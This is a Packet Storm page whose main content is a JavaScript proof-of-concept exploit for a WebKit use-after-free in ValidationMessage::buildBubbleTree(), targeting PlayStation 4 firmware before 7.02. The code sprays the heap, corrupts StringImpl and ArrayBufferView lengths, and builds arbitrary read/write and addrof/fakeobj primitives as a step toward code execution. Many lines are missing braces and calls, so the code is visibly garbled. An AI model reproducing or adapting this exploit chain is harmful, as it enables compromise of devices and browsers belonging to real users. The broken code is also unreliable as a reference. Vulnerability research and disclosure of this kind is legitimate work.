exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sony Playstation 4 ValidationMessage::buildBubbleTree() Use-After-Free

Sony Playstation 4 ValidationMessage::buildBubbleTree() Use-After-Free
Posted Dec 21, 2020
Authored by Chendochap

Sony Playstation 4 versions prior to 7.02 ValidationMessage::buildBubbleTree() use-after-free webkit code execution proof of concept exploit.

tags | exploit, code execution, proof of concept
SHA-256 | b01b121ae0926742df797a1fa7e69a00444a5233f8e6964b52a247ba8499f69e

Sony Playstation 4 ValidationMessage::buildBubbleTree() Use-After-Free

Change Mirror Download

const LENGTH_JSVIEW = 0x20;
const LENGTH_TIMER = 0x48;

const SPRAY_ELEM_SIZE = 0x6000;
const SPRAY_STRINGIMPL = 0x1000;

const NB_FRAMES = 0xfa0;
const NB_REUSE = 0x8000;

var g_arr_ab_1 = [];
var g_arr_ab_2 = [];
var g_arr_ab_3 = [];

var g_frames = [];

var g_relative_read = null;
var g_relative_rw = null;
var g_ab_slave = null;
var g_ab_index = null;

var g_timer_leak = null;
var g_jsview_leak = null;
var g_jsview_butterfly = null;
var g_message_heading_leak = null;
var g_message_body_leak = null;

var g_obj_str = {};

var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px";
var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px";

var g_round = 1;
var g_input = null;

var guess_htmltextarea_addr = new Int64("0x2031b00d8");

var master_b = new Uint32Array(2);
var slave_b = new Uint32Array(2);
var slave_addr;
var slave_buf_addr;
var master_addr;

/* Executed after deleteBubbleTree */
function setupRW() {
/* Now the m_length of the JSArrayBufferView should be 0xffffff01 */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length > 0xff) {
g_relative_rw = g_arr_ab_3[i];
debug_log("[+] Succesfully got a relative R/W");
if (g_relative_rw === null)
die("[!] Failed to setup a relative R/W primitive");

debug_log("[+] Setting up arbitrary R/W");

/* Retrieving the ArrayBuffer address using the relative read */
let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1;
let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR));

/* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */
let ab_index = g_jsview_leak.sub(ab_addr).low32();
g_ab_index = ab_index + LENGTH_JSVIEW;
g_ab_index = ab_index - LENGTH_JSVIEW;

/* Overding the length of one JSArrayBufferView with a known value */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41;

/* Looking for the slave JSArrayBufferView */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length === 0x41) {
g_ab_slave = g_arr_ab_3[i];
g_arr_ab_3 = null;
if (g_ab_slave === null)
die("[!] Didn't found the slave JSArrayBufferView");

/* Extending the JSArrayBufferView length */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff;

debug_log("[+] Testing arbitrary R/W");

let saved_vtable = read64(guess_htmltextarea_addr);
write64(guess_htmltextarea_addr, new Int64("0x4141414141414141"));
if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141"))
die("[!] Failed to setup arbitrary R/W primitive");

debug_log("[+] Succesfully got arbitrary R/W!");

/* Restore the overidden vtable pointer */
write64(guess_htmltextarea_addr, saved_vtable);

/* Cleanup memory */

/* Set up addrof/fakeobj primitives */
g_ab_slave.leakme = 0x1337;
var bf = 0;
for(var i = 15; i >= 8; i--)
bf = 256 * bf + g_relative_rw[g_ab_index + i];
g_jsview_butterfly = new Int64(bf);
if(!read64(g_jsview_butterfly.sub(16)).equals(new Int64("0xffff000000001337")))
die("[!] Failed to setup addrof/fakeobj primitives");
debug_log("[+] Succesfully got addrof/fakeobj");

/* Getting code execution */
/* ... */
var leak_slave = addrof(slave_b);
var slave_addr = read64(leak_slave.add(0x10));

og_slave_addr = new int64(slave_addr.low32(), slave_addr.hi32());
var leak_master = addrof(master_b);
write64(leak_master.add(0x10), leak_slave.add(0x10));
var prim = {
write8: function(addr, val) {
master_b[0] = addr.low;
master_b[1] = addr.hi;

if(val instanceof int64) {
slave_b[0] = val.low;
slave_b[1] = val.hi;
else {
slave_b[0] = val;
slave_b[1] = 0;

master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
write4: function(addr, val) {
master_b[0] = addr.low;
master_b[1] = addr.hi;

slave_b[0] = val;

master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
read8: function(addr) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
var r = new int64(slave_b[0], slave_b[1]);
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
return r;
read4: function(addr) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
var r = slave_b[0];
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
return r;
leakval: function(val) {
g_ab_slave.leakme = val;
master_b[0] = g_jsview_butterfly.low32() - 0x10;
master_b[1] = g_jsview_butterfly.hi32();
var r = new int64(slave_b[0], slave_b[1]);
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
return r;
window.prim = prim;
setTimeout(stage2, 1000);

function read(addr, length) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
let arr = [];
for (let i = 0; i < length; i++)
return arr;

function read64(addr) {
return new Int64(read(addr, 8));

function write(addr, data) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
for (let i = 0; i < data.length; i++)
g_ab_slave[i] = data[i];

function write64(addr, data) {
write(addr, data.bytes());

function addrof(obj) {
g_ab_slave.leakme = obj;
return read64(g_jsview_butterfly.sub(16));

function fakeobj(addr) {
write64(g_jsview_butterfly.sub(16), addr);
return g_ab_slave.leakme;

function cleanup() {
select1 = null;
input1 = null;
input2 = null;
input3 = null;
div1 = null;
g_input = null;
g_rows1 = null;
g_rows2 = null;
g_frames = null;

* Executed after buildBubbleTree
* and before deleteBubbleTree
function confuseTargetObjRound2() {
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");

g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble();

setTimeout(setupRW, 6000);

/* Executed after deleteBubbleTree */
function leakJSC() {
debug_log("[+] Looking for the smashed StringImpl...");

var arr_str = Object.getOwnPropertyNames(g_obj_str);

/* Looking for the smashed string */
for (let i = arr_str.length - 1; i > 0; i--) {
if (arr_str[i].length > 0xff) {
debug_log("[+] StringImpl corrupted successfully");
g_relative_read = arr_str[i];
g_obj_str = null;
if (g_relative_read === null)
die("[!] Failed to setup a relative read primitive");

debug_log("[+] Got a relative read");

var tmp_spray = {};
for(var i = 0; i < 100000; i++)
tmp_spray['Z'.repeat(8 * 2 * 8 - 5 - LENGTH_STRINGIMPL) + (''+i).padStart(5, '0')] = 0x1337;

let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER);

/* Spraying JSView */
let tmp = [];
for (let i = 0; i < 0x10000; i++) {
/* The last allocated are more likely to be allocated after our relative read */
if (i >= 0xfc00)
g_arr_ab_3.push(new Uint8Array(ab));
tmp.push(new Uint8Array(ab));
tmp = null;

* Force JSC ref on FastMalloc Heap
* https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151
var props = [];
for (var i = 0; i < 0x400; i++) {
props.push({ value: 0x42424242 });
props.push({ value: g_arr_ab_3[i] });

* /!\
* This part must avoid as much as possible fastMalloc allocation
* to avoid re-using the targeted object
* /!\
/* Use relative read to find our JSC obj */
/* We want a JSView that is allocated after our relative read */
while (g_jsview_leak === null) {
Object.defineProperties({}, props);
for (let i = 0; i < 0x800000; i++) {
var v = undefined;
if (g_relative_read.charCodeAt(i) === 0x42 &&
g_relative_read.charCodeAt(i + 0x01) === 0x42 &&
g_relative_read.charCodeAt(i + 0x02) === 0x42 &&
g_relative_read.charCodeAt(i + 0x03) === 0x42) {
if (g_relative_read.charCodeAt(i + 0x08) === 0x00 &&
g_relative_read.charCodeAt(i + 0x0f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x10) === 0x00 &&
g_relative_read.charCodeAt(i + 0x17) === 0x00 &&
g_relative_read.charCodeAt(i + 0x18) === 0x0e &&
g_relative_read.charCodeAt(i + 0x1f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x28) === 0x00 &&
g_relative_read.charCodeAt(i + 0x2f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x30) === 0x00 &&
g_relative_read.charCodeAt(i + 0x37) === 0x00 &&
g_relative_read.charCodeAt(i + 0x38) === 0x0e &&
g_relative_read.charCodeAt(i + 0x3f) === 0x00)
v = new Int64(str2array(g_relative_read, 8, i + 0x20));
else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 &&
g_relative_read.charCodeAt(i + 0x11) === 0x42 &&
g_relative_read.charCodeAt(i + 0x12) === 0x42 &&
g_relative_read.charCodeAt(i + 0x13) === 0x42)
v = new Int64(str2array(g_relative_read, 8, i + 8));
if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) {
g_jsview_leak = v;
props = null;
* /!\
* Critical part ended-up here
* /!\

debug_log("[+] JSArrayBufferView: " + g_jsview_leak);

/* Run the exploit again */

* Executed after buildBubbleTree
* and before deleteBubbleTree
function confuseTargetObjRound1() {
/* Force allocation of StringImpl obj. beyond Timer address */

/* Checking for leaked data */
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");


g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble();

* The timeout must be > 5s because deleteBubbleTree is scheduled to run in
* the next 5s
setTimeout(leakJSC, 6000);

function handle2() {
/* focus elsewhere */

function reuseTargetObj() {
/* Delete ValidationMessage instance */

* Free ValidationMessage neighboors.
* SmallLine is freed -> SmallPage is cached
for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++)
g_frames[i].setAttribute("rows", ',');

/* Get back target object */
for (let i = 0; i < NB_REUSE; i++) {
let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE);
let view = new Float64Array(ab);

view[0] = guess_htmltextarea_addr.asDouble(); // m_element
view[3] = guess_htmltextarea_addr.asDouble(); // m_bubble


if (g_round == 1) {
* Spray a couple of StringImpl obj. prior to Timer allocation
* This will force Timer allocation on same SmallPage as our Strings
sprayStringImpl(0, SPRAY_STRINGIMPL);

g_frames = [];
g_round += 1;
g_input = input3;

setTimeout(confuseTargetObjRound1, 10);
} else {
setTimeout(confuseTargetObjRound2, 10);

function dumpTargetObj() {
debug_log("[+] m_timer: " + g_timer_leak);
debug_log("[+] m_messageHeading: " + g_message_heading_leak);
debug_log("[+] m_messageBody: " + g_message_body_leak);

function findTargetObj() {
for (let i = 0; i < g_arr_ab_1.length; i++) {
if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) {
debug_log("[+] Found fake ValidationMessage");

if (g_round === 2) {
g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]);
g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]);
g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]);

g_fake_validation_message = g_arr_ab_1[i];
g_arr_ab_1 = [];
return true;
return false;

function prepareUAF() {

for (let i = 0; i < NB_FRAMES; i++) {
var element = document.createElement("frameset");

var div = document.createElement("div");

/* First half spray */
for (let i = 0; i < NB_FRAMES / 2; i++)
g_frames[i].setAttribute("rows", g_rows1);

/* Instantiate target obj */

/* ... and the second half */
for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++)
g_frames[i].setAttribute("rows", g_rows2);

g_input.setAttribute("onfocus", "reuseTargetObj()");
g_input.autofocus = true;

/* HTMLElement spray */
function sprayHTMLTextArea() {
debug_log("[+] Spraying HTMLTextareaElement ...");

let textarea_div_elem = document.createElement("div");
textarea_div_elem.id = "div1";
var element = document.createElement("textarea");

/* Add a style to avoid textarea display */
element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;';

* This spray is not perfect, "element.cloneNode" will trigger a fastMalloc
* allocation of the node attributes and an IsoHeap allocation of the
* Element. The virtual page layout will look something like that:
* [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...]
for (let i = 0; i < SPRAY_ELEM_SIZE; i++)

/* StringImpl Spray */
function sprayStringImpl(start, end) {
for (let i = start; i < end; i++) {
let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0"));
g_obj_str[s] = 0x1337;

function go() {
/* Init spray */

g_input = input1;
/* Shape heap layout for obj. reuse */

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2024 Packet Storm. All rights reserved.

Security Services
Hosting By